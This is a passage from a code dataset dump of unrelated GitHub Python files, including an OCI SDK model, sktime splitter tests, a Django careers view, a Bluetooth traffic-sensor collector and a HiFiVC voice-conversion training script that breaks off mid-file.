swap_total_in_kb:\n The value to assign to the swap_total_in_kb property of this HostMemoryConfiguration.\n :type swap_total_in_kb: float\n\n :param huge_page_size_in_kb:\n The value to assign to the huge_page_size_in_kb property of this HostMemoryConfiguration.\n :type huge_page_size_in_kb: float\n\n :param huge_pages_total:\n The value to assign to the huge_pages_total property of this HostMemoryConfiguration.\n :type huge_pages_total: int\n\n \"\"\"\n self.swagger_types = {\n 'metric_name': 'str',\n 'time_collected': 'datetime',\n 'page_size_in_kb': 'float',\n 'page_tables_in_kb': 'float',\n 'swap_total_in_kb': 'float',\n 'huge_page_size_in_kb': 'float',\n 'huge_pages_total': 'int'\n }\n\n self.attribute_map = {\n 'metric_name': 'metricName',\n 'time_collected': 'timeCollected',\n 'page_size_in_kb': 'pageSizeInKB',\n 'page_tables_in_kb': 'pageTablesInKB',\n 'swap_total_in_kb': 'swapTotalInKB',\n 'huge_page_size_in_kb': 'hugePageSizeInKB',\n 'huge_pages_total': 'hugePagesTotal'\n }\n\n self._metric_name = None\n self._time_collected = None\n self._page_size_in_kb = None\n self._page_tables_in_kb = None\n self._swap_total_in_kb = None\n self._huge_page_size_in_kb = None\n self._huge_pages_total = None\n self._metric_name = 'HOST_MEMORY_CONFIGURATION'\n\n @property\n def page_size_in_kb(self):\n \"\"\"\n Gets the page_size_in_kb of this HostMemoryConfiguration.\n Page size in kilobytes\n\n\n :return: The page_size_in_kb of this HostMemoryConfiguration.\n :rtype: float\n \"\"\"\n return self._page_size_in_kb\n\n @page_size_in_kb.setter\n def page_size_in_kb(self, page_size_in_kb):\n \"\"\"\n Sets the page_size_in_kb of this HostMemoryConfiguration.\n Page size in kilobytes\n\n\n :param page_size_in_kb: The page_size_in_kb of this HostMemoryConfiguration.\n :type: float\n \"\"\"\n self._page_size_in_kb = page_size_in_kb\n\n @property\n def page_tables_in_kb(self):\n \"\"\"\n Gets the page_tables_in_kb of this HostMemoryConfiguration.\n Amount of memory used for page tables in kilobytes\n\n\n :return: The page_tables_in_kb of this HostMemoryConfiguration.\n :rtype: float\n \"\"\"\n return self._page_tables_in_kb\n\n @page_tables_in_kb.setter\n def page_tables_in_kb(self, page_tables_in_kb):\n \"\"\"\n Sets the page_tables_in_kb of this HostMemoryConfiguration.\n Amount of memory used for page tables in kilobytes\n\n\n :param page_tables_in_kb: The page_tables_in_kb of this HostMemoryConfiguration.\n :type: float\n \"\"\"\n self._page_tables_in_kb = page_tables_in_kb\n\n @property\n def swap_total_in_kb(self):\n \"\"\"\n Gets the swap_total_in_kb of this HostMemoryConfiguration.\n Amount of total swap space in kilobytes\n\n\n :return: The swap_total_in_kb of this HostMemoryConfiguration.\n :rtype: float\n \"\"\"\n return self._swap_total_in_kb\n\n @swap_total_in_kb.setter\n def swap_total_in_kb(self, swap_total_in_kb):\n \"\"\"\n Sets the swap_total_in_kb of this HostMemoryConfiguration.\n Amount of total swap space in kilobytes\n\n\n :param swap_total_in_kb: The swap_total_in_kb of this HostMemoryConfiguration.\n :type: float\n \"\"\"\n self._swap_total_in_kb = swap_total_in_kb\n\n @property\n def huge_page_size_in_kb(self):\n \"\"\"\n Gets the huge_page_size_in_kb of this HostMemoryConfiguration.\n Size of huge pages in kilobytes\n\n\n :return: The huge_page_size_in_kb of this HostMemoryConfiguration.\n :rtype: float\n \"\"\"\n return self._huge_page_size_in_kb\n\n @huge_page_size_in_kb.setter\n def huge_page_size_in_kb(self, huge_page_size_in_kb):\n \"\"\"\n Sets the huge_page_size_in_kb of this HostMemoryConfiguration.\n Size of huge pages in kilobytes\n\n\n :param huge_page_size_in_kb: The huge_page_size_in_kb of this HostMemoryConfiguration.\n :type: float\n \"\"\"\n self._huge_page_size_in_kb = huge_page_size_in_kb\n\n @property\n def huge_pages_total(self):\n \"\"\"\n Gets the huge_pages_total of this HostMemoryConfiguration.\n Total number of huge pages\n\n\n :return: The huge_pages_total of this HostMemoryConfiguration.\n :rtype: int\n \"\"\"\n return self._huge_pages_total\n\n @huge_pages_total.setter\n def huge_pages_total(self, huge_pages_total):\n \"\"\"\n Sets the huge_pages_total of this HostMemoryConfiguration.\n Total number of huge pages\n\n\n :param huge_pages_total: The huge_pages_total of this HostMemoryConfiguration.\n :type: int\n \"\"\"\n self._huge_pages_total = huge_pages_total\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n","repo_name":"oracle/oci-python-sdk","sub_path":"src/oci/opsi/models/host_memory_configuration.py","file_name":"host_memory_configuration.py","file_ext":"py","file_size_in_byte":7046,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"52"} +{"seq_id":"20343925130","text":"import sys\nsys.path.append('./')\nimport torch\nfrom torch import nn\nimport torch.optim as optim\nimport torch.utils.data as utils\nfrom torch.utils.data import DataLoader, Dataset\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import make_swiss_roll\nimport matplotlib.pyplot as plt\n\nimport model as model\n\n\n\n\n\n\ninput_size = 3 # img_size = (28,28) ---> 28*28=784 in total\nhidden_size = 32 # number of nodes at hidden layer\nnum_classes = 2 # number of output classes discrete range [0,9]\nnum_epochs = 30 # number of times which the entire dataset is passed throughout the model\nlr = 1e-3 # size of step\n\n\nbatch_size = 128\n\n\nx_train, manifold_x_train = make_swiss_roll(n_samples=10000)\nx_train = x_train.astype(np.float32)\ny_train = (x_train[:, 0:1] >= 10).astype(np.float32)\nfrom sklearn.preprocessing import OneHotEncoder\nonehot_encoder = OneHotEncoder(sparse=False)\nabc = onehot_encoder.fit(y_train)\ntrain_set = utils.TensorDataset(torch.FloatTensor(x_train), torch.FloatTensor(abc.transform(y_train)))\ntrain_loader = utils.DataLoader(train_set, batch_size=batch_size, shuffle=True)\n\nx_test, manifold_x_test = make_swiss_roll(n_samples=10000)\nx_test = x_test.astype(np.float32)\ny_test = (x_test[:, 0:1] >= 10).astype(np.float32)\ntest_set = utils.TensorDataset(torch.FloatTensor(x_test), torch.FloatTensor(y_test))\ntest_loader = utils.DataLoader(test_set, batch_size=batch_size, shuffle=False)\n\n\nnet = model.Net(input_size, hidden_size, num_classes)\n# print(net)\nloss_function = nn.BCELoss() \noptimizer = torch.optim.Adam(net.parameters(), lr=lr)\nall_loss = []\n\nfor epoch in range(num_epochs):\n\n for i ,(data, labels) in enumerate(train_loader):\n\n optimizer.zero_grad()\n outputs = net(data)\n loss = loss_function(outputs, labels)\n all_loss.append(loss)\n loss.backward()\n optimizer.step()\n\nall_loss = torch.stack(all_loss)\nall_loss = all_loss.detach().numpy()\n\nplt.plot(all_loss)\nplt.show()\n\np = []\nfor data,labels in test_loader:\n\n output = net(data)\n _, predicted = torch.max(output,1)\n p.append(torch.Tensor.tolist(predicted))\n\n\ncolors_test = ['red' if label else 'blue' for label in y_test]\n\nfig = plt.figure()\nax = fig.add_subplot(1, 2, 1, projection='3d')\nax.scatter(x_test[:, 0], x_test[:, 1], x_test[:, 2], c=colors_test)\nax.set_title('origin')\nax.set_xlabel('X Label')\nax.set_ylabel('Y Label')\nax.set_zlabel('Z Label')\n\ntorch.save(net.state_dict(), './results/classification_model1.pt') \nfrom functools import reduce\nimport operator\no = reduce(operator.concat, p)\ns = np.asarray(o, dtype=np.float32)\ncolors_test = ['red' if label else 'blue' for label in s]\nax = fig.add_subplot(1, 2, 2, projection='3d')\nax.scatter(x_test[:, 0], x_test[:, 1], x_test[:, 2], c=colors_test)\nax.set_title('origin')\nax.set_xlabel('X Label')\nax.set_ylabel('Y Label')\nax.set_zlabel('Z Label')\nplt.show()\n\n\n","repo_name":"divija-palleti/SwissRoll-VAE","sub_path":"SWISS_ROLL/TEST_CLASS_ROLL/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33998367820","text":"import numpy as np\nimport pandas as pd\nimport pytest\n\nfrom sktime.forecasting.tests._config import (\n TEST_FHS,\n TEST_FHS_TIMEDELTA,\n TEST_STEP_LENGTHS,\n TEST_WINDOW_LENGTHS,\n)\nfrom sktime.split.base._common import _inputs_are_supported\nfrom sktime.split.expandingwindow import ExpandingWindowSplitter\nfrom sktime.split.singlewindow import SingleWindowSplitter\nfrom sktime.split.slidingwindow import SlidingWindowSplitter\nfrom sktime.utils._testing.hierarchical import _make_hierarchical\nfrom sktime.utils._testing.panel import _make_panel\nfrom sktime.utils._testing.series import _make_series\n\nN_TIMEPOINTS = 30\nTEST_Y_PANEL_HIERARCHICAL = [\n _make_hierarchical((2, 2), N_TIMEPOINTS, N_TIMEPOINTS),\n _make_panel(n_instances=2, n_timepoints=N_TIMEPOINTS),\n]\n\n\ndef test_split_series():\n \"\"\"Tests that split_series produces series in the split.\"\"\"\n y = _make_series()\n cv = SlidingWindowSplitter()\n\n for train, test in cv.split_series(y):\n assert isinstance(train, pd.Series)\n assert len(train) == 10\n assert isinstance(test, pd.Series)\n assert len(test) == 1\n\n\ndef test_split_loc():\n \"\"\"Tests that split_loc produces loc indices for train and test.\"\"\"\n y = _make_series()\n cv = SlidingWindowSplitter()\n\n for train, test in cv.split_loc(y):\n assert isinstance(train, pd.DatetimeIndex)\n assert len(train) == 10\n y.loc[train]\n assert isinstance(test, pd.DatetimeIndex)\n assert len(test) == 1\n y.loc[test]\n\n\ndef test_split_series_hier():\n \"\"\"Tests that split works with hierarchical data.\"\"\"\n hierarchy_levels = (2, 4)\n n_instances = np.prod(hierarchy_levels)\n n = 12\n y = _make_hierarchical(\n hierarchy_levels=hierarchy_levels, max_timepoints=n, min_timepoints=n\n )\n cv = SlidingWindowSplitter()\n\n for train, test in cv.split(y):\n assert isinstance(train, np.ndarray)\n assert train.ndim == 1\n assert train.dtype == np.int64\n assert len(train) == 10 * n_instances\n assert isinstance(test, np.ndarray)\n assert test.ndim == 1\n assert pd.api.types.is_integer_dtype(test.dtype)\n assert len(test) == 1 * n_instances\n\n for train, test in cv.split_loc(y):\n assert isinstance(train, pd.MultiIndex)\n assert len(train) == 10 * n_instances\n assert train.isin(y.index).all()\n assert isinstance(test, pd.MultiIndex)\n assert len(test) == 1 * n_instances\n assert test.isin(y.index).all()\n\n def inst_index(y):\n return set(y.index.droplevel(-1).unique())\n\n for train, test in cv.split_series(y):\n assert isinstance(train, pd.DataFrame)\n assert len(train) == 10 * n_instances\n assert isinstance(test, pd.DataFrame)\n assert len(test) == 1 * n_instances\n assert inst_index(train) == inst_index(y)\n assert inst_index(test) == inst_index(y)\n\n\ndef test_hierarchical_singlewindowsplitter():\n \"\"\"Test broadcasting of window splitters to hierarchical data.\n\n Also certifies for failure cas in bug #4972.\n \"\"\"\n y = _make_hierarchical(hierarchy_levels=(2, 3), random_state=0)\n splitter = SingleWindowSplitter(fh=[1, 2], window_length=10)\n splits = list(splitter.split(y))\n assert len(splits) == 1, \"Should only be one split\"\n\n\n@pytest.mark.parametrize(\"CV\", [SlidingWindowSplitter, ExpandingWindowSplitter])\n@pytest.mark.parametrize(\"fh\", [*TEST_FHS, *TEST_FHS_TIMEDELTA])\n@pytest.mark.parametrize(\"window_length\", TEST_WINDOW_LENGTHS)\n@pytest.mark.parametrize(\"step_length\", TEST_STEP_LENGTHS)\ndef test_windowbase_splitter_get_n_split_hierarchical(\n CV, fh, window_length, step_length\n):\n \"\"\"Test that WindowBaseSplitter.get_n_splits works for hierarchical data.\"\"\"\n # see bugs 4971\n y = TEST_Y_PANEL_HIERARCHICAL[0] # hierarchical data\n if _inputs_are_supported([fh, window_length, step_length]):\n cv = CV(fh, window_length, step_length)\n assert cv.get_n_splits(y) == len(\n list(cv.split(y))\n ), \"get_n_splits does not equal the number of splits in the output.\"\n\n\n@pytest.mark.parametrize(\"y\", TEST_Y_PANEL_HIERARCHICAL)\n@pytest.mark.parametrize(\"CV\", [SlidingWindowSplitter, ExpandingWindowSplitter])\ndef test_windowbase_splitter_get_n_split_unequal_series(y, CV):\n y_unequal = y.copy() # avoid changing original dataset\n y_unequal.iloc[:3, :] = None # make the first series shorter than the rest\n y_unequal.dropna(inplace=True)\n cv = CV([1], 24, 1)\n assert cv.get_n_splits(y_unequal) == len(\n list(cv.split(y_unequal))\n ), \"get_n_splits does not equal the number of splits in the output.\"\n","repo_name":"sktime/sktime","sub_path":"sktime/split/base/tests/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":4655,"program_lang":"python","lang":"en","doc_type":"code","stars":7028,"dataset":"github-code","pt":"52"} +{"seq_id":"10196295645","text":"from django.http import JsonResponse\nfrom django.shortcuts import render\nfrom django.views import View\nfrom django.core.mail import EmailMessage\nimport os\nfrom dashboard.models import CurrentOpportunities, ApplyForThisPosition\n\n\nclass CareerView(View):\n\n def get(self, request):\n careers = CurrentOpportunities.objects.filter(display=True).all().order_by(\"-deadline\")\n is_careers = CurrentOpportunities.objects.exists()\n context = {\n 'title': \"Career\",\n 'careers': careers,\n 'is_careers' : is_careers\n }\n return render(request, 'career/career_page.html', context)\n\n\ndef send_career_email_to_qtec(subject, file_contents, first_name, last_name, email):\n subject = subject\n body =\"First Name: {} , Last Name: {}, Email: {}\".format(first_name, last_name, email)\n from_email = 'contact.qtec@gmail.com'\n to_email = ['qtec.careers@gmail.com']\n\n email = EmailMessage(subject, body, from_email, to_email)\n\n email.attach('{} cv for position {}'.format(first_name, subject), file_contents, 'application/pdf')\n email.send()\n\n\nclass CareerDetailsView(View):\n\n def get(self, request, slug= None):\n career = CurrentOpportunities.objects.get(slug = slug,display=True)\n\n context = {\n 'title': \"Career Details of {}\".format(career.title),\n 'career': career\n }\n return render(request, 'career/career_details.html', context)\n\n def post(self, request, slug= None):\n data = request.POST\n firstname = data.get('firstname')\n lastname = data.get('lastname')\n careeremail = data.get('careeremail')\n image = request.FILES.get('image')\n career_id= data.get('career_id')\n \n career = CurrentOpportunities.objects.get(id = career_id)\n\n apply_ = ApplyForThisPosition.objects.create(current_opportunities_id= career_id ,first_name= firstname, last_name= lastname, email= careeremail, upload_cv= image)\n title = career.title\n file_contents = apply_.upload_cv.read()\n send_career_email_to_qtec(title, file_contents, firstname, lastname, careeremail)\n \n return JsonResponse({})","repo_name":"Biprajit-Karmakar/mail","sub_path":"homepage/views/career_view.py","file_name":"career_view.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25110244673","text":"#importing modules\nimport os\nimport PyPDF2\n\n#extracting files from the directory\ndir_files = os.listdir()\n\nprint(dir_files)\n\nfor files in dir_files:\n if files.endswith('.pdf'):\n print(f'SCANNING CONTENT OF {files}...')\n f = open(files,'rb')\n #crating a pdfReader object\n pdfReader = PyPDF2.PdfFileReader(f)\n\n #to print the no of pages in the pdf\n no_of_pages = pdfReader.numPages\n print(f'Total no of pages in the pdf are: {no_of_pages}')\n\n #creating anothe robject for indivisual page selection \n newPage_obj = pdfReader.getPage(0)\n\n #extracting the curent selected page content\n print(f'\\nSCANNING THE CONTENT OF PAGE...')\n print (newPage_obj.extractText())","repo_name":"rohitsinghkcodes/Coding-Sessions","sub_path":"EXTRAS/Document content reading/pdfContentCheck.py","file_name":"pdfContentCheck.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13430046785","text":"import json\n\nfrom pytraffic.collectors.util import kafka_producer, scraper, files, date_time\n\n\nclass BtSensors(object):\n \"\"\"\n This combines everything bluetooth sensors related. On init it loads sensors\n data or fetches it from web if it’s older then one day. One can use run\n method to send data to Kafka or use plot method to plot a map of\n sensors location.\n \"\"\"\n\n def __init__(self, conf):\n \"\"\"\n Initialize Kafka producer and web scraper classes. Also load bluetooth\n data.\n\n Args:\n conf (dict): This dict contains all configurations.\n\n \"\"\"\n self.conf = conf['bt_sensors']\n self.producer = kafka_producer.Producer(conf['kafka_host'],\n self.conf['kafka_topic'])\n\n self.w_scraper = scraper.Scraper(\n conf['scraper'],\n auth=(self.conf['timon_username'], self.conf['timon_password']),\n verify=self.conf['timon_crt_file'])\n\n self.not_lj = self.conf['not_lj']\n\n self.img_dir = conf['data_dir'] + self.conf['img_dir']\n self.sensors_data_file = conf['data_dir'] + self.conf['data_file']\n self.sensors_data = None\n\n def get_web_data(self):\n \"\"\"\n This requests bluetooth data from source url and makes a local copy of\n it.\n \"\"\"\n self.sensors_data = self.w_scraper.get_json(self.conf['sensors_url'])\n if self.sensors_data is not None:\n files.make_dir(self.sensors_data_file)\n with open(self.sensors_data_file, 'w') as outfile:\n json.dump(self.sensors_data, outfile)\n self.sensors_data = self.sensors_data['data']\n else:\n self.get_local_data()\n\n def get_local_data(self):\n \"\"\"\n This loads the local copy of bluetooth sensors data.\n \"\"\"\n with open(self.sensors_data_file) as data_file:\n self.sensors_data = json.load(data_file)['data']\n\n def load_data(self):\n \"\"\"\n We check if we have a not to old local copy of bluetooth sensors data.\n If yes we load it from local file, if not we get the data from source\n url and then create a local copy.\n \"\"\"\n if files.old_or_not_exists(self.sensors_data_file,\n self.conf['data_age']):\n self.get_web_data()\n else:\n self.get_local_data()\n\n def run(self):\n \"\"\"\n This scrapes data from source url. It then modifies its structure and\n forewords it to Kafka.\n \"\"\"\n data = self.w_scraper.get_json(self.conf['last_url'])\n for dist in data['data']:\n if dist['toBtId'] not in self.not_lj and \\\n dist['fromBtId'] not in self.not_lj:\n\n sensor_from = next(s for s in self.sensors_data if\n s[\"btId\"] == dist['fromBtId'])\n\n sensor_to = next(s for s in self.sensors_data if\n s[\"btId\"] == dist['toBtId'])\n\n dist['fromBtLng'] = sensor_from['loc']['lng']\n dist['fromBtLat'] = sensor_from['loc']['lat']\n dist['toBtLng'] = sensor_to['loc']['lng']\n dist['toBtLat'] = sensor_to['loc']['lat']\n\n dist['distance'] = next(s for s in sensor_from['neighbours'] if\n s[\"btId\"] == dist['toBtId'])['distance']\n\n dist['timestampTo'] = date_time.isoformat_to_utc(\n dist['timestampTo'])\n dist['timestampFrom'] = date_time.isoformat_to_utc(\n dist['timestampFrom'])\n\n self.producer.send(dist)\n self.producer.flush()\n\n def get_plot_data(self):\n \"\"\"\n This function preparers coordinates and labels for plotting.\n\n Returns:\n lng Longitude part of points coordinates.\n lat Latitude part of points coordinates.\n labels Points labels.\n\n \"\"\"\n labels = []\n lng = []\n lat = []\n for point in self.sensors_data:\n if point['btId'] not in self.not_lj:\n labels.append(point['btId'])\n lng.append(point['loc']['lng'])\n lat.append(point['loc']['lat'])\n return lng, lat, labels\n\n def plot_map(self, title, figsize, dpi, zoom, markersize, lableoffset,\n fontsize, file_name):\n \"\"\"\n This function crates a map of bluetooth sensors location.\n\n Args:\n title (str): Plot title.\n figsize (tuple of int): Figure size.\n dpi (int): Dots per inch.\n zoom (int): Map zoom.\n markersize (int): Size of dots.\n offset (tuple of float): Offset of labels from dots.\n fontsize (int): Size of labels.\n file_name (str): Name of saved file.\n\n \"\"\"\n # This import is here so the main collector is not dependent on plot\n # requirements.\n from pytraffic.collectors.util import plot\n\n lng, lat, labels = self.get_plot_data()\n\n map_plot = plot.PlotOnMap(lng, lat, title) # lng, lat, 'BT v Ljubljani'\n map_plot.generate(figsize, dpi, zoom, markersize) # (18, 18), 400, 14, 5\n map_plot.label(labels, lableoffset, fontsize) # labels, (0.001, 0.0005), 10\n map_plot.save(self.img_dir, file_name) # 'bt_lj.png'\n","repo_name":"xlab-si/DICE-BigData-Traffic","sub_path":"python_package/pytraffic/collectors/bt_sensors.py","file_name":"bt_sensors.py","file_ext":"py","file_size_in_byte":5437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38792512894","text":"\"\"\"\n조건\n1. 리스트를 이용하여 딕셔너리의 키 목록을 생성합니다.\n 키 목록은 이름,나이,취미,꿈 입니다.\n2. 생성된 리스트를 이용하여 딕셔너리에 값을 저장합니다.\n3. 딕셔너리에 저장된 값은 아래와 같이 출력합니다.\n결과\n--입력구간--\n이름 >> 홍길동\n나이 >> 23세\n취미 >> 영화시청\n꿈 >> 개발자\n--출력구간--\n이름 : 홍길동\n나이 : 23세\n취미 : 영화시청\n꿈 : 개발자\n\"\"\"\ndic = {}\nlst = [\"이름\",\"나이\",\"취미\",\"꿈\"]\nindex = 0\nprint(\"--입력구간--\")\nwhile index < len(lst):\n dic[lst[index]] = input(lst[index]+\" >> \")\n index += 1\n\nindex = 0\nprint(\"--출력구간--\")\nwhile index < len(lst):\n print(\"%s \\t : %s\"%(lst[index],dic[lst[index]]))\n index += 1\n\n\"\"\"\n변수 명명법\n1) _를 이용하는 방식 - _가 띄어쓰기를 대체한다.\nex) my_info = {}\n\n2) 카멜표기법 - 일정 규칙에 따라 값의 종류를 구별하는 방법\n- 다른 단어가 들어갈 때 다음 단어의 첫 문자를 대문자로 치환한다.\n- 변수인 경우 소문자로 시작 / 상수처럼 쓰는 경우 대문자만 사용 등\n- 낙타의 등의 형태에서 비롯된 표기법이다.\nex) myInfo = {}\n\"\"\"\nprint(\"----- 또 다른 방법 -----\")\nmyInfo = {}\nitems = [\"이름\",\"나이\",\"취미\",\"꿈\"]\nindex = 0\nwhile index < len(items):\n myInfo = [items[index]] = input(items[index]+\" >> \")\n index += 1\nindex = 0\nwhile index < len(items):\n print(items[index] + \"\\t:\", myInfo[items[index]])\n index += 1\n","repo_name":"LeeBG/PythonStudy","sub_path":"day14/10.딕셔너리EX3.py","file_name":"10.딕셔너리EX3.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14808456756","text":"import numpy as np\n\n\n\nclass Photo:\n def __init__(self, p_id, pos, noft, tags):\n self.noftag = noft\n self.id = p_id\n self.pos = pos\n self.tags = set(tags)\n self.visit = False\n\n\ndef loadInputs(file_name):\n f = open(file_name)\n text = f.readlines()\n N = int(text[0])\n text.pop(0)\n horizontal = list([])\n verticals = []\n for i in range(N):\n row = text[i].split()\n p = Photo(i, row[0], row[1], row[2:])\n if row[0] == 'V':\n verticals.append(p)\n else:\n horizontal.append(p)\n np.random.shuffle(verticals)\n res=list([])\n while len(verticals)!=0:\n temp1 = verticals[0]\n temp2=verticals[1]\n verticals.pop(0)\n verticals.pop(0)\n temp1.id=(temp1.id,temp2.id)\n temp1.tags= set(temp1.tags|temp2.tags)\n temp1.noftag=len(temp1.tags)\n res.append(temp1)\n res+horizontal\n np.random.shuffle(res)\n return res\n\n\ndef minPic(p1, p2):\n common = len(p1.tags & p2.tags)\n aDiff = len(p1.tags) - common\n bDiff = len(p2.tags) - common\n return min(common, aDiff, bDiff)\n\n\ndef createSlideShow(arr):\n # x = int(np.math.log(len(arr)))\n x = int(np.sqrt(len(arr)))\n if (x <100):\n x =100\n slide = list([])\n sum = 0\n elem = arr[0]\n slide.append(elem)\n arr.pop(0)\n while len(arr) != 0:\n elem = slide[-1]\n maxIp = 0\n maxNum = 0\n endIn = min(x, len(arr))\n for i in range(0, endIn):\n temp = minPic(elem, arr[i])\n if (temp > maxNum):\n maxNum = temp\n maxIp = i\n slide.append(arr[maxIp])\n arr.pop(maxIp)\n sum += maxNum\n\n return slide, sum\n\n\ndef printToOutput(photos):\n f = open(\"output.txt\", \"w\")\n f.write(str(len(photos))+\"\\n\")\n for photo in photos:\n f.write(' '.join([str(id)for id in photo.id])+\"\\n\")\n\n\nif __name__ == \"__main__\":\n files = [ 'a_example.txt']\n for fileFullName in files:\n pic = loadInputs(fileFullName)\n slide, sumSlide = createSlideShow(pic)\n print(\"slide: \", [elem.tags for elem in slide], \"sum: \", sumSlide)\n","repo_name":"Galit1321/HC-shecodes","sub_path":"Hello.py","file_name":"Hello.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40488861871","text":"import torch\nfrom torch.utils.data import DataLoader\nfrom torch.nn.utils import clip_grad_norm_\nimport numpy as np\nimport warnings\nimport argparse\nfrom tqdm.auto import tqdm\nimport wandb\nfrom pathlib import Path\n\nfrom src.model import HiFiVC\nfrom src.utils import read_json\nfrom src.dataset.dataset import VCDataset, collate_fn\nfrom src.loss.HiFiLoss import GeneratorLoss, DescriminatorLoss\n\n\nwarnings.filterwarnings(\"ignore\", category=UserWarning)\n\n# fix random seeds for reproducibility\nSEED = 123\ntorch.manual_seed(SEED)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\nnp.random.seed(SEED)\n\nMAX_NORM = 5\n\n@torch.no_grad()\ndef get_grad_norm(model, norm_type=2):\n parameters = model.parameters()\n if isinstance(parameters, torch.Tensor):\n parameters = [parameters]\n parameters = [p for p in parameters if p.grad is not None]\n total_norm = torch.norm(\n torch.stack(\n [torch.norm(p.grad.detach(), norm_type).cpu() for p in parameters]\n ),\n norm_type,\n )\n return total_norm.item()\n\n\ndef train(args):\n config = read_json(args.config)\n\n device = 'cuda:0' if torch.cuda.is_available() else 'cpu'\n \n model = HiFiVC(device, **config)\n model.to(device)\n dataset = VCDataset(data_path=args.data_path, part='train',\n max_audio_length=config['max_audio_length'],\n limit=config.get('limit', None))\n dataloader = DataLoader(dataset, batch_size=args.batch_size, shuffle=True,\n num_workers=args.num_workers, collate_fn=collate_fn)\n\n weight_decay = config['weight_decay']\n betas = config['betas']\n lr = config['lr']\n \n D_optimizer = torch.optim.AdamW(model.descriminator.parameters(), lr=lr, \n weight_decay=weight_decay, betas=betas)\n\n #G_params = list(model.generator.parameters()) + list(model.FModel.parameters()) +\\\n # list(model.speaker_proj.parameters())\n\n #G_params = list(model.generator.parameters()) + list(model.FModel.parameters())\n G_params = list(model.generator.parameters()) + list(model.speaker_encoder.parameters())\n #G_params = list(model.generator.parameters())\n \n G_optimizer = torch.optim.AdamW(G_params, lr=lr, \n weight_decay=weight_decay, betas=betas)\n D_scheduler = torch.optim.lr_scheduler.ExponentialLR(D_optimizer, gamma=0.999)\n G_scheduler = torch.optim.lr_scheduler.ExponentialLR(G_optimizer, gamma=0.999)\n\n descriminator_criterion = DescriminatorLoss()\n generator_criterion = GeneratorLoss()\n\n descriminator_criterion.to(device)\n generator_criterion.to(device)\n\n log_step = 50\n\n save_path = Path(args.save_path)\n save_path.mkdir(parents=True, exist_ok=True)\n\n step = 0\n\n model.train()\n model.AsrModel.eval()\n\n for epoch in range(args.n_epochs):\n print(f'Epoch: {epoch}')\n progress_bar = tqdm(dataloader)\n for i, batch in enumerate(progress_bar):\n batch['mel_spec'] = batch['mel_spec'].to(device)\n batch['real_audio'] = batch['real_audio'].to(device)\n batch['source_audio'] = batch['source_audio'].to(device)\n #batch['f0'] = batch['f0'].to(device)\n batch['audio_length'] = batch['audio_length'].to(device)\n\n g_outputs = model(**batch)\n batch.update(g_outputs)\n\n D_optimizer.zero_grad()\n\n d_outputs = model.descriminate(generated_audio=batch[\"generated_audio\"].detach(),\n real_audio=batch[\"real_audio\"])\n batch.update(d_outputs)\n\n D_loss = descriminator_criterion(**batch)\n D_loss.backward()\n clip_grad_norm_(model.descriminator.parameters(), MAX_NORM)\n\n if i % log_step == 0:\n wandb.log({\"D_loss\": D_loss.item(),\n \"D_grad\": get_grad_norm(model.descriminator)}, step=step)\n print(f\"D_loss: {D_loss.item()}\")\n\n D_optimizer.step()\n\n G_optimizer.zero_grad()\n d_outputs = model.descriminate(**batch)\n batch.update(d_outputs)\n G_loss, adv_loss, fm_loss, mel_loss, kl_loss = generator_criterion(**batch)\n\n G_loss.backward()\n clip_grad_norm_(model.generator.parameters(), MAX_NORM)\n clip_grad_norm_(model.speaker_encoder.parameters(), MAX_NORM)\n if i % log_step == 0:\n wandb.log({\n \"G_loss\": G_loss.item(),\n \"adv_loss\": adv_loss.item(),\n \"fm_loss\": fm_loss.item(),\n \"mel_loss\": mel_loss.item(),\n \"kl_loss\": kl_loss.item(),\n \"G_grad\": get_grad_norm(model.generator),\n \"VAE_grad\": get_grad_norm(model.speaker_encoder)\n },step=step)\n generated_audio = batch['generated_audio'][0].detach().cpu().numpy().T\n real_audio = batch['real_audio'][0].detach().cpu().numpy().T\n wandb.log({\n 'step_generated_audio': wandb.Audio(generated_audio, sample_rate=24000),\n 'step_real_audio': wandb.Audio(real_audio, sample_rate=24000)\n }, step=step)\n\n print(f\"G_loss: {G_loss.item()}\")\n\n G_optimizer.step()\n\n D_scheduler.step()\n G_scheduler.step()\n step += 1\n torch.save(model.state_dict(), str(save_path / f'model.pth'),\n _use_new_zipfile_serialization=False)\n generated_audio = batch['generated_audio'][0].detach().cpu().numpy().T\n real_audio = batch['real_audio'][0].detach().cpu().numpy().T\n wandb.log({\n 'generated_audio': wandb.Audio(generated_audio, sample_rate=24000),\n 'real_audio': wandb.Audio(real_audio, sample_rate=24000)\n }, step=step)\n \n\nif __name__ == '__main__':\n args = argparse.ArgumentParser(description=\"PyTorch Template\")\n args.add_argument(\n \"-c\",\n \"--config\",\n default=\"config.json\",\n type=str,\n help=\"config file path (default: config.json)\",\n )\n args.add_argument(\n \"-d\",\n \"--data_path\",\n default=None,\n type=str,\n help=\"data path (default: None)\",\n )\n args.add_argument(\n \"-s\",\n \"--save_path\",\n default='saved',\n type=str,\n help=\"save path (default: saved)\",\n )\n args.add_argument(\n \"-n\",\n \"--n_epochs\",\n default=120,\n type=int,\n help=\"number of epochs (default: 120)\",\n )\n args.add_argument(\n \"-b\",\n \"--batch_size\",\n default=20,\n type=int,\n help=\"batch_size (default: 20)\",\n )\n args.add_argument(\n \"--num_workers\",\n default=2,\n type=int,\n help=\"number of workers (default: 2)\",\n 